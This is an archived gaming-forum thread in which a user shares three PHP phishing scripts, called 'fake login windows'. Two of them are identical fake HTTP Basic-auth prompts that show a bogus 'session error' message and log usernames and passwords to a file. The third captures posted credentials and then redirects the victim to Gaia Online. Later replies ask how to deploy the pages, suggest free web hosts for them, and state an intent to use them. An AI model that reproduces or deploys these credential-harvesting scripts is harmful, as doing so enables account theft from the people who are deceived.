A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

I just felt like putting this here

1.1k views · started by Taz ·
#1
I just felt like putting this here
I have these in my notepad so ill just put them here.
They are not mine! But you can rep me if you want :P
Some are flw or flps i didn't check them.

<?php
if(isset($_SERVER['PHP_AUTH_USER'])){
$Handle = @fopen('accounts.txt', 'a');

@fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}\r\n");
@fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}\r\n\r\n");

@fclose($Handle);
}

header('WWW-Authenticate: Basic realm="A session error has occured please verify your Username and Password."');
header('HTTP/1.0 401 Unauthorized');
exit;
?>



<?php
if(isset($_SERVER['PHP_AUTH_USER'])){
$Handle = @fopen('accounts.txt', 'a');

@fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}\r\n");
@fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}\r\n\r\n");

@fclose($Handle);
}

header('WWW-Authenticate: Basic realm="A session error has occured please verify your Username and Password."');
header('HTTP/1.0 401 Unauthorized');
exit;
?>


<?php
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username." | ".$password."\r\n");
fclose($logfile);

header ("Location: http://www.gaiaonline.com/launch/towns");
?>
#2
So yea they are flw but how to fuck am i supposed to make them pop up.. Oh and +Rep
#3
o.0 i dont understand
#4
mylilnikka wrote:
So yea they are flw but how to fuck am i supposed to make them pop up.. Oh and +Rep


Gratyan wrote:
o.0 i dont understand


Make a t35 or 110mb account and put them there.
#5
hey taz can u redirect me to a t35 cause i wanna use this >:D
#7
lemme think... these are layouts for fake websites?
#8
Gratyan wrote:
lemme think... these are layouts for fake websites?


They are flw's [Fake login windows]
#9
umm ok then lemme see ... i will try to make one to xD